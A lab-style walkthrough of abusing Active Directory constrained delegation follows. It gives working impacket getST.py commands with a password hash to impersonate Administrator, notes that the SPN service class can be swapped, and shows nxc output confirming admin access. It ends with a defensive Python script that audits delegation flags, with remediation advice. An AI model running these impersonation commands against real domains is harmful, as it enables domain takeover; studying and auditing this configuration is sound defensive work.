Constrained Delegation Privileges
AllowedToDelegate (msds-allowedtodelegateto)
You can list accounts configured for constrained delegation in BloodHound with the following Cypher query:
MATCH p=()-[r:AllowedToDelegate]->() RETURN p
Open the source node and check the “Allowed To Delegate” SPN value.
Then you can impersonate any user to the service named by that SPN (accounts marked “sensitive and cannot be delegated” or placed in Protected Users are excluded by the KDC); in our example the SPN is “www/dc.domain.htb”.
cd /tmp/
unset KRB5CCNAME
rm *.ccache
getST.py -spn 'www/dc.domain.htb' -impersonate 'Administrator' -hashes ':4c395675187a74271de7c4af867ad417' 'domain.htb/compromised' -dc-ip 10.129.95.154
[...]
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.domain.htb@DOMAIN.HTB.ccache
[...]
If you get a clock skew error (Kerberos rejects requests when your clock differs from the DC's by more than a few minutes), sync your time with the DC:
sudo rdate -n dc.domain.htb
Often you can change the service class of the SPN to the one you need without problem, because the service name sits in the unencrypted part of the ticket and is not integrity-protected.
SMB requires a CIFS SPN, while WinRM requires WSMAN or HTTP.
mv *.ccache adminwww.ccache
export KRB5CCNAME="$(pwd)/adminwww.ccache"
klist "$KRB5CCNAME"
nxc smb dc.domain.htb --use-kcache
SMB 10.129.95.154 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:domain.htb) (signing:True) (SMBv1:False)
SMB 10.129.95.154 445 DC [+] domain.htb\Administrator from ccache (Pwn3d!)
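The steps above show the attacker's view of one delegation edge. The following script, added here as an example and not part of the original notes or of impacket/BloodHound, shows the defender's audit of the same configuration: it parses SPNs into class/host/port, flags accounts that hold msDS-AllowedToDelegateTo (distinguishing plain constrained delegation from constrained delegation with protocol transition, which is what the S4U2self-then-S4U2proxy path on this page needs), groups targets by host because the service class is interchangeable, and reports which watched accounts lack the NOT_DELEGATED protection. Account names mirror the page; the userAccountControl values and extra accounts are constructed for the example.

```python
"""Audit Active Directory delegation settings from exported account records.

Added example for this page, not part of the original notes or of impacket /
BloodHound. It works on plain dicts shaped like LDAP attributes so it runs
offline; in practice the records would come from an LDAP search for
(msDS-AllowedToDelegateTo=*) plus the privileged accounts you want to check.
"""
from dataclasses import dataclass

# userAccountControl bits that govern delegation (MS-SAMR / MS-ADTS values).
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
UF_NOT_DELEGATED = 0x00100000                   # "sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # protocol transition (S4U2self for any user)


def parse_spn(spn: str) -> dict:
    """Split 'class/host[:port][/name]' into its components (class and host lowercased)."""
    parts = spn.split("/")
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError(f"malformed SPN: {spn!r}")
    host, _, port = parts[1].partition(":")
    return {
        "class": parts[0].lower(),
        "host": host.lower(),
        "port": int(port) if port else None,
        "name": parts[2] if len(parts) > 2 else None,
    }


@dataclass(frozen=True)
class Finding:
    account: str
    kind: str        # "unconstrained" | "constrained" | "constrained+protocol-transition"
    hosts: tuple     # hosts reachable through the delegation (empty for unconstrained)


def audit_delegation(accounts: list) -> list:
    """Return one Finding per account that can delegate, keyed by reachable host.

    The service class of an S4U2proxy ticket (www, cifs, wsman, ...) lives in the
    cleartext sname of the ticket and is not integrity-protected, so the audit
    groups targets by host rather than by full SPN: delegation to www/dc is
    effectively delegation to every service on dc.
    """
    findings = []
    for acct in accounts:
        uac = int(acct.get("userAccountControl", 0))
        targets = acct.get("msDS-AllowedToDelegateTo", [])
        if uac & UF_TRUSTED_FOR_DELEGATION:
            findings.append(Finding(acct["sAMAccountName"], "unconstrained", ()))
        if targets:
            hosts = tuple(sorted({parse_spn(t)["host"] for t in targets}))
            kind = "constrained"
            if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
                # Without protocol transition S4U2self yields a non-forwardable
                # ticket and the S4U2proxy step on this page fails.
                kind += "+protocol-transition"
            findings.append(Finding(acct["sAMAccountName"], kind, hosts))
    return findings


def unprotected_accounts(accounts: list, watchlist: set) -> list:
    """Names from the watchlist whose tickets a delegating account could still obtain.

    NOT_DELEGATED (or Protected Users membership, not modelled here) makes the KDC
    refuse S4U2self/S4U2proxy for that user; any watched account lacking it is exposed.
    """
    exposed = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        if name in watchlist and not int(acct.get("userAccountControl", 0)) & UF_NOT_DELEGATED:
            exposed.append(name)
    return sorted(exposed)


# Constructed sample records mirroring the page's scenario (account names from the
# page; attribute values and the extra accounts are made up for the example).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "compromised",
     "userAccountControl": 0x200 | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["www/dc.domain.htb", "WWW/dc.domain.htb:8080"]},
    {"sAMAccountName": "websrv$",
     "userAccountControl": 0x1000 | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_backup",
     "userAccountControl": 0x200 | UF_NOT_DELEGATED},
]
WATCHLIST = {"Administrator", "svc_backup"}

if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{f.account:<15} {f.kind:<35} -> {', '.join(f.hosts) or '(any service)'}")
    print("exposed to impersonation:", unprotected_accounts(SAMPLE_ACCOUNTS, WATCHLIST))
```

On the constructed sample the audit reports compromised as constrained+protocol-transition towards dc.domain.htb (the two www SPNs collapse to one host), websrv$ as unconstrained, and Administrator as the only watched account still exposed, since svc_backup carries NOT_DELEGATED. The remediation that follows from the output is the usual one: remove delegation rights that are not needed, mark high-value accounts as sensitive or add them to Protected Users, and treat every host in the hosts column as fully reachable by the delegating account regardless of the service class written in the SPN.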